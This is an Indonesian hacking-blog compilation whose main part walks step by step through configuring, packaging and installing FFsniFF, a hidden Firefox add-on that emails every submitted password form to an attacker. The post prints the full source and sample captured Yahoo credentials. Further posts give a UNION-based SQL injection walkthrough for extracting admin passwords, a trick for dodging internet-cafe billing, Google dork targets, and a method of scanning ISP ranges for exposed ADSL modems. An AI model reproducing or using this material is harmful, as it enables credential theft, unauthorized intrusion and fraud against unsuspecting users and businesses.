Addon dipaketkan dan disebarkan dalam bentuk file ZIP, namun ekstensi filenya bukan zip melainkan XPI (dibaca “zippy”). Dalam file xpi tersebut ada banyak file dan folder lain seperti source code javascript, gambar dan file xml deskriptor. File-file yang umumnya ada dalam sebuah paket zippy adalah:

1
2
3
4
5
6
7
8
9
10
11
exampleExt.xpi:
              /install.rdf
              /components/*
              /components/cmdline.js
              /defaults/
              /defaults/preferences/*.js
              /plugins/*
              /chrome.manifest
              /chrome/icons/default/*
              /chrome/
              /chrome/content/
install.rdf adalah deskriptor untuk keperluan instalasi. Selain itu di dalam paket itu juga ada file javascript yang berisi kode program yang menjalankan fungsi addon. Selebihnya adalah file-file untuk menangani user interface addon.
Membuat paket instalasi ffsniff.xpi
Langkah awal saya harus membuat paket instalasi addon ffsniff.xpi. Untuk itu saya harus mengunduh file sumber FFsniFF dari http://azurit.elbiahosting.sk/ffsniff/. Setelah diunduh, file tar.gz itu harus dimekarkan. Isi dari paket itu setelah dimekarkan adalah:
1
2
3
4
5
6
7
8
9
pkg_creator.py
src/
src/install.rdf
src/chrome/
src/chrome/content/
src/chrome/content/ffsniff/
src/chrome/content/ffsniff/ffsniffOverlay.xul
src/chrome/content/ffsniff/ffsniffOverlay_orig.js
src/chrome/content/ffsniff/contents.rdf
File tar.gz itu tidak bisa langsung diinstall ke firefox karena masih berbentuk kumpulan file yang harus diubah dan dibungkus menjadi paket zippy (xpi). Sebenarnya untuk membuat paket zippy sudah disediakan script pkg_creator.py dalam bahasa python, namun dalam artikel ini saya tidak memakai script itu agar saya bisa menunjukkan bagaimana proses pembuatan file xpi dari source code.
Setelah source berhasil didownload, berikutnya saya harus membuat file ffsniffOverlay.js, caranya adalah dengan mengcopy file ffsniffOverlay_orig.js dalam nama ffsniffOverlay.js. Setelah itu ffsniffOverlay.js akan saya edit untuk mengubah beberapa variabel berikut:
1
2
3
4
5
6
7
var send_from_host = "<SEND_FROM_HOST>";
var send_from = "<SEND_FROM>";
var send_to = "<SEND_TO>";
var subject = "<SUBJECT>";
var smtp_host = "<SMTP_HOST>";
var smtp_port = "<SMTP_PORT>";
var enable_hide = "<HIDDING>";
Konfigurasi smtp untuk @ilmuhacking.com
MX record ilmuhacking.comMX record ilmuhacking.com
Variabel-variabel tersebut adalah parameter untuk mengirim email melalui smtp. smtp_host berisi alamat smtp server yang dipakai untuk mengirim email. Sebaiknya gunakan smtp server yang bertanggung jawab untuk domain email yang kita tuju, dalam kasus ini domain email tujuan adalah @ilmuhacking.com. Oleh karena itu saya harus mencari smtp server yang bertanggung jawab untuk domain ilmuhacking.com. Cara mencarinya adalah dengan melihat MX record dari DNS ilmuhacking.com. Anda bisa gunakan layanan dnswatch.info untuk mencari MX record ilmuhacking.com. Perhatikan gambar di samping, terlihat bahwa ternyata smtp server untuk ilmuhacking.com berada di host yang sama, jadi smtp_host saya isi dengan ilmuhacking.com. Pada domain lain biasanya mail server adalah mail.domainanda.com.
send_from dan send_to saya isi dengan nilai yang sama, yaitu testing@ilmuhacking.com, alamat itu adalah alamat email asal dan tujuan. Perhatikan bahwa domain email sumber dan tujuan harus dalam domain yang sama (ilmuhacking.com) karena smtp server umumnya tidak bersedia mengirimkan email ke domain lain (istilahnya open relay) bila pengirim tidak memasukkan password dulu (anonymous).
enable_hide sengaja saya isi “no” untuk kemudahan, dalam kasus nyata variabel ini harus diisi dengan “yes” agar tersembunyi dari daftar addon sehingga tidak membuat korban curiga. Bila anda masih coba-coba, sebaiknya isi dulu dengan “no”.
smtp_port adalah port smtp server, port standar untuk layanan smtp adalah 25. subject adalah subject dari email yang akan berisi password korban.
1
2
3
4
5
6
7
var send_from_host = "ilmuhacking.com";
var send_from = "testing@ilmuhacking.com";
var send_to = "testing@ilmuhacking.com";
var subject = "Log Firefox Sniffer";
var smtp_host = "ilmuhacking.com";
var smtp_port = "25";
var enable_hide = "no";
Konfigurasi smtp untuk @telkom.net
Agar lebih memahami tentang konfigurasi email ini, saya beri contoh lain dengan email tujuan ke telkom.net.Dengan cara yang sama saya harus membaca MX record dari domain telkom.net, ternyata MX record untuk telkom.net ada 2: mx1.mail.plasa.com dan mx2.mail.plasa.com. Terserah mau pilih yang mana saja. Karena memakai smtp server telkom.net, email tujuan harus berada di domain @telkom.net, di sini saya pakai rizki.wicaksono@telkom.net. Alamat asal saya isi sama dengan email tujuan. Ini berarti saya mengirim email dari dan ke email yang sama, itu tidak masalah. send_from_host saya isi dengan telkom.net karena ini adalah domain. Jadi konfigurasi smtp untuk email tujuan @telkom.net adalah sebagai berikut:
1
2
3
4
5
6
7
var send_from_host = "telkom.net";
var send_from = "rizki.wicaksono@telkom.net";
var send_to = "rizki.wicaksono@telkom.net";
var subject = "Log Firefox Sniffer";
var smtp_host = "mx1.mail.plasa.com";
var smtp_port = "25";
var enable_hide = "no";
Membuat file ffsniff.jar
Setelah variabel-variabel di file ffsniffOverlay.js sudah diubah, langkah berikutnya adalah membuat file ffsniff.jar. Walaupun ekstensi filenya adalah jar, sebenarnya ini adalah file zip biasa. File-file yang dimasukkan dalam ffsniff.jar adalah:
content/ffsniff/contents.rdf
content/ffsniff/ffsniffOverlay.js
content/ffsniff/ffsniffOverlay.xul
Hasil file ffsniff.jar harus mengikutsertakan folder content/ffsniff, tidak boleh 3 file itu dizip tanpa mengikutsertakan foldernya. Jadi untuk membuat file ffsniff.jar harus berada di parent folder dari content/ffsniff. Anda bebas menggunakan program apa saja untuk kompresi zip ini, saya sendiri memakai WinRAR. Ketika dibuka dengan WINRAR isi dari ffsniff.jar tampak seperti gambar di bawah ini, perhatikan kolom pathnya harus berisi seperti itu.
ffsniff.jar list filesffsniff.jar list files
Membuat file ffsniff.xpi
Setelah mendapatkan file ffsniff.jar, selanjutnya saya harus membuat paket instalasi ffsniff.xpi. File ini juga file zip biasa, walaupun ekstensinya .xpi. Isi file ffsniff.xpi adalah dua file berikut:
install.rdf
chrome/ffsniff.jar
Jangan lupa juga ffsniff.jar harus dizip dalam folder chrome. Gambar di bawah ini menunjukkan ffsniff.xpi yang dibuka dengan winrar, perhatikan juga kolom pathnya harus tepat seperti itu.
ffsniff.xpi file listffsniff.xpi file list
Instalasi Firefox Sniffer
Oke, kini selesai sudah proses pembuatan file instalasi addon FFsniffer. Kini saya bisa menginstall addon tersebut. Cara instalasi file xpi adalah dengan membuka Firefox, kemudian memasukkan path lokasi file xpi pada addressbar firefox. Setelah muncul daftar file di firefox, klik file xpi yang akan diinstall. Cara instalasi FFsniFF diperlihatkan pada gambar di bawah ini. Setelah berhasil install jangan lupa untuk restart firefox anda.
instalasi firefox snifferinstalasi firefox sniffer
Mencoba login ke yahoo
Kini saya akan mencoba login ke yahoo dengan username rizkiwicaksono. Setelah login, saya periksa inbox email testing@ilmuhacking.com. Ternyata email hasil sniff password ketika login ke yahoo sudah masuk. Isi emailnya terlihat pada gambar di bawah ini.
log sniffer emaillog sniffer email
Dalam email tersebut terlihat bahwa FFsniff tidak hanya mencatat username dan password tapi semua field dengan tag input (input type=”xxx”) dari form, yaitu: password field, hidden field, text field, checkbox. Selain itu FFsniff juga mencatat URL, nama field, jenis dan nilainya. FFsniFF hanya mengirimkan field yang ada isinya, bila field tersebut kosong, field tersebut tidak akan dikirim.
Email Sniffer Log
Mari kita perhatikan email yang dikirimkan FFsniFF. Header lengkap email yang dikirim FFsniff adalah sebagai berikut:
1
2
3
4
5
6
7
8
9
Return-path: <testing@ilmuhacking.com>
Envelope-to: testing@ilmuhacking.com
Delivery-date: Fri, 27 Feb 2009 03:23:48 -0600
Received: from [202.43.xxx.xxx] (port=23982 helo=ilmuhacking.com)
     by gator669.hostgator.com with esmtp (Exim 4.69)
     (envelope-from <testing@ilmuhacking.com>)
     id 1Lcywa-0002DK-Jj
     for testing@ilmuhacking.com; Fri, 27 Feb 2009 03:23:48 -0600
Subject: Log Firefox Sniffer
Dalam email tersebut hanya ada 1 header Received, yaitu dari host 202.43.xxx.xxx (ip lengkap saya sensor). Hal ini menunjukkan bahwa smtp server yang saya pakai kebetulan adalah smtp server yang paling dekat dengan si penerima sehingga tidak perlu dioper ke smtp server lain. Berikut ini adalah header email FFsniFF yang dikirim ke telkom.net:
Return-Path: <rizki.wicaksono@telkom.net>
Received: from [125.160.17.193] (HELO mx1.mail.telkom.net)
  by f1.c.plasa.com (CommuniGate Pro SMTP 4.3.9)
  with ESMTPS id 690188427 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:05:27 +0700
Received: from mx1.mail.plasa.com ([222.124.18.71])
 by mx1.mail.telkom.net  with esmtp id 1LeiKy-0001qP-O1
 for rizki.wicaksono@telkom.net; Wed, 04 Mar 2009 11:04:20 +0700
X-IronPort-Anti-Spam-Filtered: true
X-IronPort-Anti-Spam-Result: AggYAH+MrUnKK6ce/2dsb2JhbACBTosbIQGGVoIPsFshAQKSPQEDgSwG
X-IronPort-AV: E=McAfee;i="5300,2777,5542"; a="119895912"
Received: from xxxxdtp.net.id (HELO telkom.net) ([202.43.xx.xx])
  by mx1.mail.plasa.com with ESMTP; 04 Mar 2009 11:02:49 +0700
Subject: Log Firefox Sniffer
X-HAM-Check: YES
Date: Wed, 04 Mar 2009 11:05:27 +0700
Message-ID: <auto-000690188427@f1.c.plasa.com>
Dalam email ke telkom.net ada 3 header Received. Yang pertama adalah mx1.mail.plasa.com, ini adalah smtp server yang saya pakai di FFsniFF. Kemudian dari situ email dioper ke mx1.mail.telkom.net, dan terakhir dioper lagi ke f1.c.plasa.com, yang merupakan smtp server yang paling dekat dengan si penerima. Jadi sebenarnya saya bisa juga langsung mengirim email ke telkom.net dengan menggunakan smtp server f1.c.plasa.com. Namun karena MX record telkom.net menunjuk ke mx1.mail.telkom.net lebih baik saya pakai smtp server itu, walaupun perlu dioper sebanyak 2 kali untuk sampai di tujuan.
FFsniff mengirimkan email tersebut secara anonymous, artinya ffsniff tidak melakukan authentication sebelum mengirimkan email. SMTP server tidak mungkin menolak email yang ditujukan untuk domain yang dikelola dirinya sendiri, walaupun pengirimnya adalah anonymous (tanpa authentication), sebab bila smtp server menolak email untuk dirinya sendiri maka orang lain tidak akan bisa mengirim email ke domain itu.
Karena dikirimkan secara anonymous maka email tersebut tidak bisa ditujukan ke domain lain selain ilmuhacking.com karena smtp server tersebut kemungkinan besar akan menolak dijadikan titik relay pengiriman email ke domain lain. Bila ingin mengirimkan email untuk domain lain tidak bisa secara anonymous, sebelumnya harus memasukkan perintah smtp AUTH LOGIN dan memasukkan username/password dalam base64. Saya tidak akan menjelaskan terlalu panjang soal email, di lain kesempatan akan saya bahas detil cara kerja email.
Pencegahan
Bad guys already know about FFsniff since 3 years ago
FFsniff diciptakan pada bulan maret 2006, tepat 3 tahun yang lalu sehingga addon ini sudah dikenal luas sebagai salah satu tools hacking. Sekarang bagaimana caranya agar kita tidak menjadi korban addon ini?
Berikut ini tips agar tidak menjadi korban FFsniff:
  • Jangan sembarangan menginstall addon yang tidak anda kenal. Install addon hanya dari situs resmi Firefox Addon https://addons.mozilla.org/
  • Install Addon hanya dari situs yang menggunakan https. Penggunaan https ini sangat penting agar anda tidak tersesat mengakses situs palsu yang berusaha memberikan anda addon yang sudah diracuni spyware. Mengenai pentingnya https ini bisa anda baca di artikel: understanding https
  • firefox safe modefirefox safe mode
  • Bila anda berada di komputer publik, gunakan Firefox dalam Safe Mode (mode aman). Mode ini adalah mode menjalankan firefox dengan mematikan semua addon yang ada.
  • Walaupun FFsniFF dapat menyembunyikan diri dari daftar addon Firefox, namun tetap saja dia tidak mungkin bisa bersembunyi di file system. Jika anda ragu apakah firefox anda bersih dari FFsniFF, silakan buka folder Profile Mozilla Firefox anda. Biasanya di:
  • 1
    
    C:\Documents and Settings\<username>\Application Data\Mozilla\Firefox\Profiles\<some-random-text>\extensions\
    firefox extension folderfirefox extension folder
    Kemudian perhatikan file install.rdf, dalam file itu terlihat nama dan deskripsi addon. Atau anda juga bisa melihat folder di dalamnya lagi untuk membaca file dot js dari ffsniff. How FFsniff Works Saya telah menunjukkan mulai dari mengunduh, menginstall dan kemudian mendapatkan password ketika ada yang login di firefox yang telah dipasang addon ini. Kini saatnya saya menjelaskan cara kerja FFsniff ini. Inti dari FFsniff ini ada pada file ffsniffOverlay.js. File ini berisi semua code yang melakukan sniffing. Berikut adalah source code lengkap ffsniffOverlay.js.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    
    var transportService = Components.classes["@mozilla.org/network/socket-transport-service;1"].getService(Components.interfaces.nsISocketTransportService);
    var transport = "";
    var outstream = "";
    var instream = Components.classes["@mozilla.org/scriptableinputstream;1"].createInstance(Components.interfaces.nsIScriptableInputStream);
    var stream = "";
    // find out FF version
    var appInfo = Components.classes["@mozilla.org/xre/app-info;1"].getService(Components.interfaces.nsIXULAppInfo);
    var versionChecker = Components.classes["@mozilla.org/xpcom/version-comparator;1"].getService(Components.interfaces.nsIVersionComparator);
     
    var data = "";
    var data0 = "EHLO " + send_from_host + "\r\n"
    var data1 = "MAIL FROM: <" + send_from + ">\r\n"
    var data2 = "RCPT TO: <" + send_to + ">\r\n"
    var data3 = "DATA\r\n"
    var data4 = "\r\n.\r\n"
    var data5 = "QUIT\r\n"
    function send_data() {
     transport = transportService.createTransport(null, 0, smtp_host, smtp_port, null);
     outstream = transport.openOutputStream(0, 0, 0);
     stream = transport.openInputStream(0, 0, 0);
     instream.init(stream);
     
     // this will avoid 'Improper use of SMTP command pipelining'
     // error on SMTP servers
     outstream.write(data0, data0.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data1, data1.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data2, data2.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data3, data3.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data, data.length);
     // don't read here cos no data was send to us
     //while (instream.available() == 0) {}
     //instream.read(instream.available());
     
     outstream.write(data4, data4.length);
     while (instream.available() == 0) {}
     instream.read(instream.available());
     
     outstream.write(data5, data5.length);
     while (instream.available() == 0) {}
     
     outstream.close();
     instream.close();
    }
    if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
     var workingThread = function() {
     };
     
     workingThread.prototype = {
      run: function() {
       send_data();
      }
     };
    } else {
     var runnable = {
      run: function() {
       send_data();
      }
     }
    }
    function sniff() {
     // if we are running under 3.0 or later
     if (versionChecker.compare(appInfo.version, "3.0") >= 0) {
      var thread = Components.classes["@mozilla.org/thread-manager;1"].getService().newThread(0);
      thread.dispatch(new workingThread(), thread.DISPATCH_NORMAL);
     } else {
      var thread = Components.classes["@mozilla.org/thread;1"].getService(Components.interfaces.nsIThread);
      thread.init(runnable, 512*1024, Components.interfaces.nsIThread.PRIORITY_NORMAL, Components.interfaces.nsIThread.SCOPE_LOCAL, Components.interfaces.nsIThread.STATE_UNJOINABLE);
     }
    }
     
    function do_sniff() {
     var ok = 0;
     var hesla = window.content.document.getElementsByTagName("input");
     data = "";
     for (var i = 0; i < hesla.length; i++) {
      if (hesla[i].value != "") {
       if (hesla[i].type == "password") {
        ok = 1;
       }
       if (hesla[i].name == "") {
        data += hesla[i].type + ":" + "<blank>:" + hesla[i].value + "\n";
       }
       else {
        data += hesla[i].type + ":" + hesla[i].name +":" + hesla[i].value + "\n";
       }
      }
     }
     if (ok == 1) {
      data = "Subject: " + subject + "\r\n\r\n" + window.top.content.document.location + "\n" + "type:name:value\n" + "---------------\n" + data;
      sniff()
     }
    }
    function hide_me() {
     var RDFService = Components.classes["@mozilla.org/rdf/rdf-service;1"].getService(Components.interfaces.nsIRDFService);
     var Container = Components.classes["@mozilla.org/rdf/container;1"].createInstance(Components.interfaces.nsIRDFContainer);
     var extensionDS = Components.classes["@mozilla.org/extensions/manager;1"].getService(Components.interfaces.nsIExtensionManager).datasource;
     var root = RDFService.GetResource("urn:mozilla:item:root");
     var nameArc = RDFService.GetResource("http://www.mozilla.org/2004/em-rdf#name");
     Container.Init(extensionDS, root);
     var elements = Container.GetElements();
     while (elements.hasMoreElements()) {
      var element = elements.getNext();
      var name = "";
      var target = extensionDS.GetTarget(element, nameArc, true);
      if (target) {
       name = target.QueryInterface(Components.interfaces.nsIRDFLiteral).Value;
       if (name == "FFsniFF") {
        Container.RemoveElement(element, true);
       }
      }
     }
    }
    if (enable_hide == "yes") {
     hide_me();
    }
    window.addEventListener("submit", do_sniff, false);
    Perhatikan baris ke-127 pada source di atas, bila enable_hide diset “yes”, maka ffsniff akan menjalankan fungsi hide_me(). hide_me() bertugas menghilangkan FFsniff dari daftar addon agar kehadirannya tidak disadari pengguna. Cara menyembunyikan diri adalah dengan cara menjalankan fungsi Container.RemoveElement (baris ke-122) hanya bila element itu bernama “FFsniFF”.
    how ffsniff works 
    how ffsniff works
    Fungsi sniffing sesungguhnya ada pada baris terakhir. Pada baris terakhir, terdapat fungsi addEventListener(). Fungsi ini berguna untuk mengaitkan event submit dengan fungsi do_sniff. Artinya fungsi do_sniff akan dijalankan setiap kali terjadi event submit. Event submit akan terjadi bila ada request POST di browser, antara lain dengan melalui klik tombol bertipe submit (input type=”submit”). Namun tidak hanya melalui klik saja, submit bisa juga dilakukan oleh javascript. Dengan cara apapun, bila terjadi request POST di browser, event submit akan terjadi, dan artinya fungsi do_sniff juga akan dipanggil. Untuk lebih jelasnya perhatikan gambar di atas. Kini fokus perhatian kita pindah ke fungsi do_sniff (baris ke-84). Dalam fungsi sniff, ffsniffer mengambil daftar semua tag <input> yang ada dengan fungsi window.content.document.getElementsByTagName(“input”). Kemudian semua field tersebut akan digabung dalam variabel string data. Hanya bila dalam form tersebut terdapat password field (input type=”password”), maka ffsniffer akan mengirimkan email, bila hanya form biasa (bukan form login), ffsniffer tidak akan mengirim email. Bila mengandung password field, berikutnya fungsi sniff (baris ke-73) akan dijalankan. Fungsi sniff ini tugasnya hanya membuat dan menjalankan thread. Thread tersebut bertugas melakukan pengiriman email dengan memanggil fungsi send_data (baris ke-17). Fungsi send_data akan membuka koneksi tcp ke smtp server, kemudian mengirimkan perintah smtp untuk mengirim email. Dengan menggunakan sniffer Wireshark, berikut adalah komunikasi yang terjadi ketika email dikirim ke telkom.net:
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    
    220-mx1.mail.plasa.com ESMTP
    220 UBE, porn, and abusive content not allowed
    EHLO telkom.net
    250-mx1.mail.plasa.com
    250-8BITMIME
    250 SIZE 20971520
    MAIL FROM: <rizki.wicaksono@telkom.net>
    250 sender <rizki.wicaksono@telkom.net> ok
    RCPT TO: <rizki.wicaksono@telkom.net>
    250 recipient <rizki.wicaksono@telkom.net> ok
    DATA
    354 go ahead
    Subject: Log Firefox Sniffer
     
    
    https://login.yahoo.com/config/login?
    
    type:name:value
    ---------------
    hidden:.tries:2
    hidden:.intl:us
    hidden:.u:6220o3t4qrv31
    hidden:.v:0
    hidden:.challenge:Uhh09ZXeYC4rgGkrSkirh.TXeHk_
    hidden:hasMsgr:0
    hidden:.chkP:Y
    hidden:.done:http://my.yahoo.com
    hidden:.pd:_ver=0&c=&ivt=&sg=
    text:login:rizkiwicaksono
    password:passwd:inipasswordku
    checkbox:.persistent:y
    submit:.save:Sign In
    .
    250 ok:  Message 119895912 accepted
    221 mx1.mail.plasa.com
    QUIT
    Sedangkan komunikasi yang terjadi ketika email dikirim ke @ilmuhacking.com adalah:
    220-gator669.hostgator.com ESMTP Exim 4.69 #1 Tue, 03 Mar 2009 22:15:33 -0600
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
    EHLO ilmuhacking.com
    250-gator669.hostgator.com Hello ilmuhacking.com [202.43.xxx.xxx]
    250-SIZE 52428800
    250-PIPELINING
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
    MAIL FROM: <testing@ilmuhacking.com>
    250 OK
    RCPT TO: <testing@ilmuhacking.com>
    250 Accepted
    DATA
    354 Enter message, ending with "." on a line by itself
    Subject: Log Firefox Sniffer
     
    
    https://login.yahoo.com/config/login?
    
    type:name:value
    ---------------
    hidden:.tries:1
    hidden:.intl:us
    hidden:.u:eljvtc94qs023
    hidden:.v:0
    hidden:.challenge:7FWzfTnmnC3Njv1YadcWnM61LyIw
    hidden:hasMsgr:0
    hidden:.chkP:Y
    hidden:.done:http://my.yahoo.com
    hidden:.pd:_ver=0&c=&ivt=&sg=
    text:login:rizkiwicaksono
    password:passwd:inipasswordakujuga
    checkbox:.persistent:y
    submit:.save:Sign In
    .
    250 OK id=1LeiW6-0002zu-LA
    QUIT
    221 gator669.hostgator.com closing connection
    Dengan selesainya eksekusi send_data() maka ffsniff telah selesai menjalankan tugasnya mengirim email. Selanjutnya ffsniff akan “tidur” menunggu dipanggil oleh event submit dan mulai kembali proses penyadapan password. Source: ilmuhacking . com

Google Hack File – My Uncle Google

By : fauzan
Sebelum Anda mendownload file – file yang ter-attachment pastikan Anda memiliki pdf reader (adobe reder, foxit reader dsbnya)untuk membaca file yang ter-attachment. Jika Anda tidak memiliki silahkan download gratis di :
http://www.foxitsoftware.com/downloads/
http://www.adobe.com/products/acrobat/readstep2.html
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =
Dalam File google hack berisi tentang barisan kode atau perintah yang mencakup 9 hal yaitu :
1. Online Cameras – Dengan string ini Anda bisa mengkontrol kamera keamanan pada sebuah jaringan terbuka.

2. View Blocked Sites – Hack ini mengijinkan Anda untuk melihat sebuah halaman website yang sengaja dibuang dari search engine agar tidak terakses sehingga halaman ini tidak bisa dicari oleh search engine.
3. Front Page user logins – Menggunakan String berikut Anda bisa menemukan file log in (user & password yang masih tersandikan) pada pengguna Microsoft FrontPage.
4. PHP Photo Albums – String algoritma pencari ini memungkinkan Anda untuk mengakses photo album yang berbasis PHP dan memasukan foto Anda ke album mereka.
5. VNC User Info – VNC adalah virtual computer controller yang mengijinkan Anda mengkontrol komputer Anda dari mana saja.
6. Network Printers – Dengan string ini, Anda bisa melihat printer yang telah di-share melalui public network, Anda juga bisa melihat status, setting dan beberapa file yang “mungkin” dapat Anda print.
7. PHP Admistrator Access – PHPMyAdmin adalah sebuah account dimana orang – orang dapat mengkontrol data mereka dan isi web mereka untuk ditampilkan dalam sebuah website yang mereka buat.
8. Download MP3/MPG/MPEG/MP4 dan multimedia lainnya – dengan menggunakan string berikut Anda bisa mendownload lagu, film, video clip dari sebuah situs yang memiliki celah yang dikarenakna tidak memiliki authentifikasi page.
9. Tampilan Halaman Google sesuai yang kita inginkan – Gunakan string berikut untuk merubah tampilan google susuai kebutuhan kita.
= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Bermain Warnet Gratis

By : fauzan

Contoh screen status yg ada di warnet (edelweis)





Heey semuanyaaa! Berjumpa lagi dengan sayaa di tips dan trik! Hahahaaa… Di trik dan tips kali ini aku mau ngejelasin trik tips mengakali warnet dengan menggunakan ZHider! Di sini kita bakalan mencoba berinternet ria di warnet secara murah meriah!! Caranya gampaang! Kalian cuman perlu download Zhider di sini.

Untuk selanjutnyaa, aku bakal ngejelasin dulu tentang sistem billing di warnet.
Kalian pasti pernah khan ke warnet?? Naah, klo pernah pasti kalian bakal muncul halaman login di komputer yg kalian pake di warnet. Itu sebetulnya saat muncul layar login, komputer dah bisa dipake buat browsing. Cuman keganggu ajah sama layar login yg mengharuskan kita untuk mengisi layar login tersebut sehingga kitapun kudu bayar. Nah, dengan menggunakan ZHider, kita bisa menyembunyikan layar login dengan mudaah! Caranya bener2 sederhanaa!
Berikut ini langkahnyaaa:

  1. Pastikan warnet yg kamu pilih masih banyak bilik/kamar yg kosong. Soalnya klo rame ntar operator curiga kenapa masih ada bilik yg kosong?
  2. Baiknya sih kamu pilih bilik yg paling jauh dari operator warnet biar gak ketauan bilik kamu kosong atau ngga.
  3. Nyalakan komputer di depan kamu klo masih dalam keadaan mati.
  4. Klo ada login screen, kamu login ajah kaya biasa.
  5. Jalanin ZHider yg udah kamu download di sini, klo bisa dari rumah dimasukin ajah ke flashdisc atau disket biar gak usah download di warnet.
  6. Klo ZHider dah dibukaa, langsung ajah logout.
  7. Ntar pasti muncul login screen, kamu pencet CTRL+ALT+Z
  8. Dan login screennya menghilaang! Kamu bisa browsing sepuas-puasnya sampai matiiii! MERDEKAAAAA!!!!!!!
  9. Klo dah puas, kamu pencet CTRL+ALT+X untuk menampilkan kembali login screen yg udah kita sembunyikan tadi.
  10. Login seperti biasaa, kamu browsing2 dulu beberapa menit sampai penunjuk waktunya di atas 5 menit. Tujuannya biar operator warnet gak curiga.
  11. Logout, pasang muka babyface seolah-olah tanpa dosa, dan bayar tarif!
  12. DONNNNEEEEEEEEE!!!!! OYEAAAAAHH!!
Ini khusus untuk warnet yg punya operator yg gak kenal kamu, atau operatornya sering tidur, atau operator yg bisanya cuman nerima pembayaran ajaa (baca: TOLOL).
Dan berikut ini beberapa hotkeys yg ada di ZHider. Untuk lebih lengkapnya baca ajah readmenya:
CTRL+ALT+Z Menyembunyikan jendela aktif
CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan
CTRL+ALT+L Menampilkan dialog zhider
CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider.
Aku kasih tips dan trik bukan berarti aku mau kalian internetan gratis di warnet sembarangan. Ini cuman buat kalian yg depresi, stres, sampai2 pengen bunuh diri karena saking pengennya online tapi dompet tipis. Lagian aku juga cuman pengen share ajah kok! Gak ada maksud apa2! Hehehehe…
Nah, Okeh! Selamat Mencobaaa…! Saya gak nanggung klo kalian ketauan!
~ G O O D L U C K !~

Simple Blind SQL Injection Method

By : fauzan
Simple Blind SQL Injection Methode V4 Tutorial
Langkah Pertama:
Find the target
ex: /news.php?pid=1
Add character ‘ at end of url to find error message.
ex: /news.php?pid=1′ atau
===========
=step two=
===========
find and count to amount the table in database.
use the command : order by
es: [site]/news.php?pid=-1+order+by+1–
chek step by step…
misal: /news.php?pid=-1+order+by+1–
/news.php?pid=-1+order+by+2–
/news.php?pid=-1+order+by+3–
/news.php?pid=-1+order+by+4–
so it appears error message or missing error…
ex: /news.php?pid=-1+order+by+5–
so that we take is up to number 4
ex: /news.php?pid=-1+order+by+4–
============
=step three=
============
for show the numbers that appear use the union
coz it error until 5
do this: /news.php?pid=-1+union+select+1,2,3,4–

=============
=step four:=
=============
find the tabble
you can use your logic
example the table is
admin, admins, login, logins, user, users
use command +from+(table_name)–
ok do this
ex : /news.php?pid=-1+union+select+1,2,3,4+from+admin–
if not have error
and you can see the number is appear for example 2
go to the next step
============
=step five=
============
find the username & peassword coloumn
for username
use ur logic again
example:
user, usr, username, user_name, login, user_admin, name, admin_user, and etc
last number 2 is appear
do this
ex : /news.php?pid=-1+union+select+1,username,3,4+from+admin–
example appear : admin
admin is username
for password
use ur logic again
example:
password, pswd, passwd, pass, pwd, kunci, masuk, sandi, and etc
ex : /news.php?pid=-1+union+select+1,password,3,4+from+admin–
example appear : 123456
123456 is password
===============
=step six:=
===============
ok in the last step you must find admin page
ex : website.com/admin
sorry bhs inggris hehehehe..
=====================
: Special thx to :
Allah SWT
: My teacher :
vyc0d, Gonzhack
=====================
: thx to :
MR.FRIBO, DHIYAT, BOBYHIKARU, N4CK0, RAJEZ, AZZURE,SICK_HACKER, mas UTUH
AA EZHA, crusdd2, DIMAZ,DUDULS, slalu_ngantuk,ku51_g0y4n9 & BEJAMZ
: thx for the team :
N.G.U TEAM, CYBERDOS TEAM, HACKER NEWBIE TEAM, XPGROUND TEAM, DEVILZC0DE, TECON CREW, IDC
=====================

Teknik Hacking Modem ADSL dan Account Speedy

By : fauzan
Langkah Pertama
Buka aplikasi mIRC? pilih server Dalnet? dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Dalnet Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning. Lihat gambar dibawah ini.

Image



Langkah Kedua
Buka aplikasi Advanced Port Scanner v1.0 Beta 1, kemudian cari sebuah IP contoh 125.160.33.41 ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari 125.160.33.1-125.160.33.255, jadi angka yang diambil hanya 125.160.33. bukan 125.160.33.41 dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.

Image

Langkah Ketiga
Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda..

Image

Gambar diatas merupakan login dari modem PROLINK type H9200.

Image

